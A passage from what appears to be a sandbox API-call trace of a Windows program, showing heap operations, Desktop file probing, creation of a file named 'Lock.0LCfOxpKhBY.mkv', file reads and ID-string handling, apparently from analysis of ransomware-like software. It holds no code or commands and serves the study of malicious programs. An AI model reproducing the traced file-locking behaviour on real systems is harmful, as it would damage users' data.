Size=0x10) returned 0x2aa9568 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75d08 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.681] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75d08 | out: hHeap=0x2af0000) returned 1 [0086.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0086.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0086.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.682] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.0LCfOxpKhBY.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.0lcfoxpkhby.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0086.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7120 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0086.683] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0086.683] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0086.737] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0086.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0086.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x37c2020 [0086.740] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0086.740] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x4b96, lpOverlapped=0x0) returned 1 [0086.742] ReadFile (in: hFile=0x2c4, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0086.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.742] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2a8a138 [0086.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37c2020 | out: hHeap=0x2af0000) returned 1 [0086.744] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0086.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2a8ecd8 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0086.745] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.745] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.745] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2a8a138 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.746] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.746] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0086.747] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.747] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0086.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0086.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2a8a138 [0086.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b58 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0086.747] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0086.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4b96) returned 0x2a93878 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0086.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0086.748] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0086.748] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0086.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.749] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.749] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0086.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.749] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0086.749] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0086.750] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0086.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.750] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.750] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0086.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.750] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0086.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.750] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.750] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.750] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.750] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.750] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0086.750] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.751] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0086.751] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0086.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0086.751] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0086.751] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 